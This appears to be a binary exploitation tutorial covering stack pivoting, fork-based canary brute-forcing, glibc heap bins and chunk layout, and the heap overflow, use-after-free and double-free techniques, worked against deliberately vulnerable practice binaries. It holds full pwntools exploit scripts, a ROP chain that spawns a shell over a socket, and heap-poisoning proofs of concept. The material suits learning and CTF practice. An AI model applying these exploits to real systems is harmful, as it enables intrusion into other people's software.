payload = flat(
'A' * 104,
POP_CHAIN,
buffer,
0, # r13
0, # r14
0 # r15
)
pause()
p.sendline(payload)
print(p.recvline())
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.
$r2 -d -A $(pidof vuln)
[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00
0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68
You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop
.
[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp
0x7ffce2d4fc00
You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0
into r13
.
[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141
What? We passed in 0x0
to the gadget!
Remember, however, that pop r13
is equivalent to mov r13, [rsp]
- the value from the top of the stack is moved into r13
. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA
was popped into it - because that's what the top of the stack points to now.
Now we understand the intricacies of the pop, let's just finish the exploit off. To account for the additional pop
calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(104, b'A') # pad to 104
payload += flat(
POP_CHAIN,
buffer # rsp - now stack points to our buffer!
)
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(104, b'A') # pad to 104
payload += flat(
POP_CHAIN,
buffer # rsp
)
pause()
p.sendline(payload)
print(p.recvline())
Stack Pivoting
// gcc source.c -o vuln -no-pie
#include <stdio.h>
void winner(int a, int b) {
if(a == 0xdeadbeef && b == 0xdeadc0de) {
puts("Great job!");
return;
}
puts("Whelp, almost...?");
}
void vuln() {
char buffer[0x60];
printf("Try pivoting to: %p\n", buffer);
fgets(buffer, 0x80, stdin);
}
int main() {
vuln();
return 0;
}
It's fairly clear what the aim is - call winner()
with the two correct parameters. The fgets()
means there's a limited number of bytes we can overflow, and it's not enough for a regular ROP chain. There's also a leak to the start of the buffer, so we know where to set RSP to.
We'll try two ways - using pop rsp
, and using leave; ret
. There's no xchg
gadget, but it's virtually identical to just popping RSP anyway.
Since I assume you know how to calculate padding, I'll tell you there's 96 until we overwrite stored RBP and 104 (as expected) until stored RIP.
Just to get the basics out of the way, as this is common to both approaches:
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
Using leave; ret to stack pivot
By calling leave; ret
twice, as described, this happens:
mov rsp, rbp
pop rbp
mov rsp, rbp
pop rbp
By controlling the value popped into RBP, we can control RSP.
As before, but with a difference:
$ ROPgadget --binary vuln | grep 'leave'
0x000000000040117c : leave ; ret
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
I won't bother stepping through it again - if you want that, check out the pop rsp walkthrough.
payload = flat(
'A' * 96,
buffer,
LEAVE_RET
)
pause()
p.sendline(payload)
print(p.recvline())
Essentially, that moves buffer
into RSP (as described previously).
You might be tempted to just chuck the payload into the buffer and boom, RSP points there, but you can't quite - as with the previous approach, there is a pop
instruction that needs to be accounted for - again, remember leave
is
mov rsp, rbp
pop rbp
So once you overwrite RSP, you still need to give a value for the pop rbp
.
payload = flat(
0x0, # account for final "pop rbp"
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP)
payload += flat(
buffer,
LEAVE_RET
)
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
payload = flat(
0x0, # rbp
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0,
elf.sym['winner']
)
payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP)
payload += flat(
buffer,
LEAVE_RET
)
pause()
p.sendline(payload)
print(p.recvline())
Flaws with fork()
Some processes use fork()
to deal with multiple requests at once, most notably servers.
An interesting side-effect of fork()
is that memory is copied exactly. This means everything is identical - ELF base, libc base, canaries.
This "shared" memory is interesting from an attacking point of view as it allows us to do a byte-by-byte bruteforce. Simply put, if there is a response from the server when we send a message, we can work out when it crashed. We keep spamming bytes until there's a response. If the server crashes, the byte is wrong. If not, it's correct.
This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from RIP.
I won't be making a binary for this (yet), but you can check out ippsec's Rope writeup for HTB - Rope root was this exact technique.
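For a rough idea of what the bruteforce loop looks like, here is a sketch against a hypothetical forking service on localhost:9001 that replies with "Thanks!" whenever the child doesn't crash (the padding, port and success marker are all assumptions):

```python
from pwn import *

context.log_level = 'error'

def brute_qword(padding: int, known: bytes = b'') -> bytes:
    # guess one byte at a time; a reply means the child survived, so the byte is correct
    value = known
    while len(value) < 8:
        for guess in range(256):
            p = remote('localhost', 9001)
            p.send(b'A' * padding + value + bytes([guess]))
            reply = p.recvall(timeout=0.5)
            p.close()
            if b'Thanks!' in reply:
                value += bytes([guess])
                break
    return value

canary = brute_qword(40)        # e.g. 40 bytes of padding before the canary
print(f'Canary: {hex(u64(canary))}')
```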
Still learning :)
Moving onto heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practise.
I'll do everything I can to make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now, but as you progress understanding the source will become more and more important.
When we are done with a chunk's data, the data is freed using a function such as free()
. This tells glibc that we are done with this portion of memory.
In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100
bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?
It is the bins that are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations will vary depending on the bins as well to keep high performance.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.
There are four bins: fastbins, the unsorted bin, smallbins and largebins.
When a chunk is freed, the function that does the bulk of the work in glibc is _int_free()
. I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old version without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to where they are in the present day! You can change the version on the left in bootlin to see how it's changed.
First, the size
of the chunk is checked. If it is less than the largest fastbin size, add it to the correct fastbin
Otherwise, if it's mmapped, munmap
the chunk
Finally, consolidate the chunk with any neighbouring free chunks and put it into the unsorted bin
What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.
There is only one of these. When small and large chunks are freed, they end up in this bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - this is the Last Remainder Chunk. If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the same size are stored in the same bins. Small bins are doubly-linked and allocation and deallocation is FIFO.
The purpose of the FD
and BK
pointers, as we saw before, is to point to the chunks ahead and behind in the bin.
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.
There are 63 large bins, and each can store chunks within a range of sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.
The first 32 bins have a range of 64 bytes:
1st bin: 512 - 568 bytes
2nd bin: 576 - 632 bytes
[...]
Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.
Each bin is represented by two values, the HEAD
and TAIL
. As it sounds, HEAD
is at the top and TAIL
at the bottom. Most insertions happen at the HEAD
, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL
. For fastbins, the TAIL
is null
.
Unlike the stack, heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.
In C, this often means using functions such as malloc()
to request the space. However, the heap is very slow and can take up tons of space. This means that the developer has to tell libc when the heap data is "finished with", and it does this via calls to free()
which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.
In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.
When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks through the bins in the following order:
If the requested size is fastbin size, check the corresponding fastbin
If there is a chunk in it, return it
If the requested chunk is of smallbin size, check the corresponding smallbin
If there is a chunk in it, return it
If the requested chunk is large (of largebin size), we first consolidate the fastbins with malloc_consolidate()
. We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
If it is empty, we service the request from the top chunk, moving it back to make space (growing the heap if necessary)
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger, the chunk is sorted into its corresponding small or large bin, and we carry on searching
One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!
Much like the name suggests, this technique involves us using data once it has been freed. The weakness here is that programmers often wrongly assume that once a chunk is freed it cannot be used, and don't write checks to ensure a pointer isn't used after its chunk is freed. This means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
void vuln(int childfd) {
char buffer[30];
read(childfd, buffer, 500);
write(childfd, "Thanks!", 8);
}
void win() {
system("/bin/sh");
}
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
payload = b'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA'
pause()
p.sendline(payload)
$ r2 -d -A $(pidof vuln)
[0x7f741033bdee]> pdf @ sym.vuln
[...]
â”” 0x0040126b c3 ret
[0x7f741033bdee]> db 0x0040126b
[0x7f741033bdee]> dc
hit breakpoint at: 40126b
[0x0040126b]> pxq @ rsp
0x7ffd323ee6f8 0x41415041414f4141 0x4153414152414151 AAOAAPAAQAARAASA
[...]
[0x0040126b]> wopO 0x41415041414f4141
40
payload = flat(
'A' * 40,
elf.sym['win']
)
p.sendline(payload)
p.interactive()
$ ROPgadget --binary vuln | grep "pop rdi"
0x000000000040150b : pop rdi ; ret
$ ROPgadget --binary vuln | grep "pop rsi"
0x0000000000401509 : pop rsi ; pop r15 ; ret
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0
if the fastbin is empty). Every chunk in the fastbin has an fd
pointer, which points to the next chunk in the bin (or is 0
if it is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd
of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list
Let's have a visual demonstration (it will help)! Try out the following C program:
#include <stdio.h>
#include <stdlib.h>
int main() {
char *a = malloc(20);
char *b = malloc(20);
char *c = malloc(20);
printf("a: %p\nb: %p\nc: %p\n", a, b, c);
puts("Freeing...");
free(a);
free(b);
free(c);
puts("Allocating...");
char *d = malloc(20);
char *e = malloc(20);
char *f = malloc(20);
printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}
We get:
a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010
As you can see, the chunk a
gets reassigned to chunk f
, b
to e
and c
to d
. So, if we free()
a chunk, there's a good chance our next malloc()
- if it's of the same size - will use the same chunk.
It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:
HEAD --> a -> b
In this case HEAD points to a
, and a
points onwards to b
as the next chunk in the bin (because the fd
field of a
points to b
). Now let's say we free another chunk c
. If we want to add it to the end of the list like so:
HEAD --> a -> b -> c
We would have to update the fd
pointer of b
to point at c
. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of this list, which could be many chunks long. This means that to add c
in at the end, it would first have to start at the head and traverse through the entire list until it got to the last chunk, then overwrite the fd
field of the last chunk to point at c
and make c
the last chunk.
Meanwhile, if it adds at the HEAD:
HEAD --> c -> a -> b
All we need to do is:
Set the fd
of c
to point at a
This is easy, as a
was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c
, making it the head of the list
This is also easy, as the pointer to c
is freely available
This has much less overhead!
For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a
by reading the fd
of c
than it is to traverse the entire list until it gets to the end.
Internally, every chunk - whether allocated or free - is stored in a malloc_chunk
structure. The difference is how the memory space is used.
When space is allocated from the heap using a function such as malloc()
, a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.
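As a rough sketch (on 64-bit, where this metadata takes up 0x10 bytes), the pointer malloc() returns points just past the metadata, at the user data:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main() {
    char *mem = malloc(0x28);                      // ask for 0x28 bytes of user data
    uint64_t *chunk = (uint64_t *) (mem - 0x10);   // the chunk itself starts 0x10 bytes earlier
    printf("mem:   %p\n", mem);
    printf("chunk: %p\n", (void *) chunk);
    printf("size:  %#lx\n", chunk[1]);             // prints 0x31, i.e. 0x30 | PREV_INUSE
}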
The size
field is the overall size of the chunk, including metadata. It must be a multiple of 8
, meaning the last 3 bits of the size
are 0
. This allows the flags A
, M
and P
to take up that space, with A
being the 3rd-last bit of size
, M
the 2nd-last and P
the last.
The flags have special uses:
P
is the PREV_INUSE
flag, which is set when the previous adjacent chunk (the chunk directly before this one in memory) is in use
M
is the IS_MMAPPED
flag, which is set when the chunk is allocated via mmap()
rather than a heap mechanism such as malloc()
A
is the NON_MAIN_ARENA
flag, which is set when the chunk is not located in main_arena
; we will get to Arenas in a later section, but in essence every created thread is provided a different arena (up to a limit) and chunks in these arenas have the A
bit set
prev_size
is set if the previous adjacent chunk is free, as calculated by P
being 0
. If it is not, the heap saves space and prev_size
is part of the previous chunk's user data. If it is, then prev_size
stores the size of the previous chunk.
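As a small illustration (this is not glibc's actual code, just the same bit layout), the flags and the real size can be pulled out of a size field like so:
#include <stdio.h>
#include <stdint.h>
#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS      (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
int main() {
    uint64_t size_field = 0x95;   // hypothetical on-heap value: 0x90 | PREV_INUSE | NON_MAIN_ARENA
    printf("real size:      %#lx\n", size_field & ~(uint64_t) SIZE_BITS);
    printf("PREV_INUSE:     %lu\n", size_field & PREV_INUSE);
    printf("IS_MMAPPED:     %lu\n", (size_field & IS_MMAPPED) >> 1);
    printf("NON_MAIN_ARENA: %lu\n", (size_field & NON_MAIN_ARENA) >> 2);
}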
Free chunks have additional metadata to handle the linking between them.
This can be seen in the malloc_chunk
struct:
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
http://exploit.education/phoenix/heap-one/
This program:
Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name
of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name
variables of the heapStructures
Prints something
Let's break on and after the first strcpy
.
As we expected, we have two pairs of heapStructure
and name
chunks. We know the strcpy
will be copying into wherever name
points, so let's read the contents of the first heapStructure
. Maybe this will give us a clue.
Look! The name
pointer points to the name
chunk! You can see the value 0x602030
being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!
And where better to target than the GOT?
The plan, therefore, becomes:
Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner
But what function should we overwrite? The only function called after the strcpy
is printf
, according to the source code. And if we overwrite printf
with winner
it'll just recursively call itself forever.
Luckily, compilers like gcc
optimise calls to printf
into calls to puts
when the format string has no format specifiers (it's just a plain string ending in a newline) - we can see this with radare2:
So we can simply overwrite the GOT address of puts
with winner
. All we need to find now is the padding until the pointer and then we're good to go.
Break on and after the strcpy
again and analyse the second chunk's name
pointer.
The pointer is originally at 0x8d9050
; once the strcpy occurs, the value there is 0x41415041414f4141
.
The offset is 40.
Again, null bytes aren't allowed in parameters so you have to remove them.
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd
pointer. This means if chunk a
points to chunk b
, once chunk a
is freed the next chunk in the bin is chunk b
.
In a double-free, we attempt to control fd
. By overwriting it with an arbitrary memory address, we can tell malloc()
where the next chunk is to be allocated. For example, say we overwrote a->fd
to point at 0x12345678
; once a
is free, the next chunk on the list will be 0x12345678
.
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a
twice:
Fairly logical.
But what happens if we called malloc()
again for the same size?
Well, strange things would happen. a
is both allocated (in the form of b
) and free at the same time.
If you remember, the heap attempts to save as much space as possible and when the chunk is free the fd
pointer is written where the user data used to be.
But what does this mean?
When we write into the user data of b
, we're writing into the fd
of a
at the same time.
And remember - controlling fd
means we can control where the next chunk gets allocated!
So we can write an address into the data of b
, and that's where the next chunk gets placed.
Now, the next alloc will return a
again. This doesn't matter, we want the one afterwards.
Boom - an arbitrary write.
http://exploit.education/phoenix/heap-zero/
Luckily it gives us the source:
So let's analyse what it does:
Allocates two chunks on the heap
Sets the fp
variable of chunk f
to the address of nowinner
Copies the first command-line argument to the name
variable of the chunk d
Runs whatever the fp
variable of f
points at
The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.
Let's check out the heap in normal conditions.
We'll break right after the strcpy and see how it looks.
If we want, we can check the contents.
So, we can see that the function address is there, after our input in memory. Let's work out the offset.
Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn pattern.
Let's break on and after the strcpy
. That way we can check the location of the pointer then immediately read it and calculate the offset.
So, the chunk with the pointer is located at 0x2493060
. Let's continue until the next breakpoint.
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
Notice we overwrote the size
field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060
).
So, fairly simple - 80 characters, then the address of winner
.
Consolidating fastbins
Previously, I said that chunks that go to the unsorted bin consolidate, but fastbins do not. This is technically not true - they just don't consolidate automatically; in order for them to consolidate, the malloc_consolidate() function has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.
Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd
pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!
If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate()
, they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd
and bk
will point to a location in malloc_state
, which is contained within libc.
This means that the more important thing for us to know is how we can trigger a call to malloc_consolidate().
Some of the most important ways include:
Inputting a very long number into scanf
(around 0x400
characters long)
This works because the code responsible for it manages a scratch_buffer
and assigns it 0x400
bytes, but uses malloc
when the data is too big (along with realloc
if it gets even bigger than the heap chunk, and free
at the end, so it works to trigger those functions too - great for triggering hooks!).
Inputting something along the lines of %10000c
into a format string vulnerability also triggers a chunk to be created
Both of these work because a largebin allocation triggers malloc_consolidate
. By checking the calls to the function in malloc.c (glibc 2.35), we can find other triggers.
The most common and most important trigger: a call to malloc()
requesting a chunk of largebin size will consolidate the fastbins before the request is serviced.
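As a minimal sketch of that trigger (assuming a pre-tcache glibc such as 2.23 - with a tcache you would first have to fill the corresponding tcache bin), a single largebin-sized request is enough to push a freed fastbin chunk into the normal bins, at which point its fd points into main_arena:
#include <stdio.h>
#include <stdlib.h>
int main() {
    char *a = malloc(0x28);       // fastbin-sized chunk
    malloc(0x18);                 // guard chunk, so a doesn't merge into the top chunk
    free(a);                      // a sits in a fastbin; its fd/bk stay on the heap
    malloc(0x500);                // largebin-sized request -> malloc_consolidate()
    printf("%p\n", *(void **)a);  // a's fd now points into main_arena, inside libc
}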
There is another call to it in the use_top section of _int_malloc(). This section is reached when the top chunk has to be used to service the request. The code checks whether the top chunk is large enough to service the request:
If not, checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate
to attempt to regain space to service the request!
So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate()
.
(If both conditions fail, _int_malloc
falls back to essentially using mmap
to service the request).
TODO
Calling malloc_trim() will consolidate fastbins (which makes sense, given the name malloc_trim
). Unlikely to ever be useful, but please do let me know if you find a use for it!
When changing malloc options using mallopt
, the fastbins are consolidated first as well. This is pretty useless, as mallopt
is likely called once (if at all) in the program prelude before it does anything.
else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}
/*
If this is a large request, consolidate fastbins before continuing [...]
*/
else
{
idx = largebin_index (nb);
if (atomic_load_relaxed (&av->have_fastchunks))
malloc_consolidate (av);
}
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
It wouldn't be fun if there were no protections, right?
Using Xenial Xerus, try running:
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
free(a);
free(a);
return 1;
}
Notice that it throws an error.
Is the chunk at the top of the bin the same as the chunk being inserted?
For example, the following code still works:
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}
When removing the chunk from a fastbin, make sure the size falls into the fastbin's range
The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd
with something like 0x08041234
, you have to make sure the metadata fits - i.e. the size ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.
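As a minimal sketch of what that means in practice (assuming a pre-tcache glibc such as 2.23, the Xenial one used above, and a hypothetical fake chunk under our control), the qword just before the target data has to look like a valid size for that fastbin:
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
uint64_t fake[4];                          // pretend this sits somewhere we want to control
int main() {
    fake[1] = 0x40;                        // fake size field matching the 0x40 fastbin
    char *a = malloc(0x30), *b = malloc(0x30);
    free(a); free(b); free(a);             // double-free: the fastbin is now a -> b -> a
    char *c = malloc(0x30);                // returns a, which is still queued in the bin
    *(uint64_t *)c = (uint64_t)&fake[0];   // overwrite a's fd with our fake chunk
    malloc(0x30); malloc(0x30);            // pop b, then a, off the fastbin
    char *win = malloc(0x30);              // returns &fake[2] - the size check passes
    strcpy(win, "controlled!");
}
If fake[1] held a value that maps to a different fastbin index, the final malloc() would instead abort with malloc(): memory corruption (fast).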
Reintroducing double-frees
Tcache poisoning is a fancy name for a double-free in the tcache chunks.
Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Protostar.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
struct heapStructure {
int priority;
char *name;
};
int main(int argc, char **argv) {
struct heapStructure *i1, *i2;
i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
void winner() {
printf(
"Congratulations, you've completed this level @ %ld seconds past the "
"Epoch\n",
time(NULL));
}
$ r2 -d -A heap1 AAAA BBBB
$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0 e8fbfdffff call sym.imp.puts
$ ragg2 -P 200 -r
AABAA...
$ r2 -d -A heap1 AAABAA... 0000
[0x004006cd]> wopO 0x41415041414f4141
40
from pwn import *
elf = context.binary = ELF('./heap1', checksec=False)
param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')
p = elf.process(argv=[param1, param2])
print(p.clean().decode('latin-1'))
char *a = malloc(0x20);
free(a);
free(a);
char *b = malloc(0x20);
strcpy(b, "\x78\x56\x34\x12");
malloc(0x20); /* This is yet another 'a', we can ignore this */
char *controlled = malloc(0x20); /* This is in the location we want */
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
char name[64];
};
struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];
};
void winner() {
printf("Congratulations, you have passed this level\n");
}
void nowinner() {
printf(
"level has not been passed - function pointer has not been "
"overwritten\n");
}
int main(int argc, char **argv) {
struct data *d;
struct fp *f;
if (argc < 2) {
printf("Please specify an argument to copy :-)\n");
exit(1);
}
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
strcpy(d->name, argv[1]);
printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
fflush(stdout);
f->fp();
return 0;
}
$ r2 -d -A heap0 AAAAAAAAAAAA <== that's just a parameter
$ s main; pdf
[...]
0x0040075d e8fefdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x00400762 488b45f8 mov rax, qword [var_8h]
[...]
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762
$ ragg2 -P 200 -r
$ r2 -d -A heap0 AAABAACAADAAE...
[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d
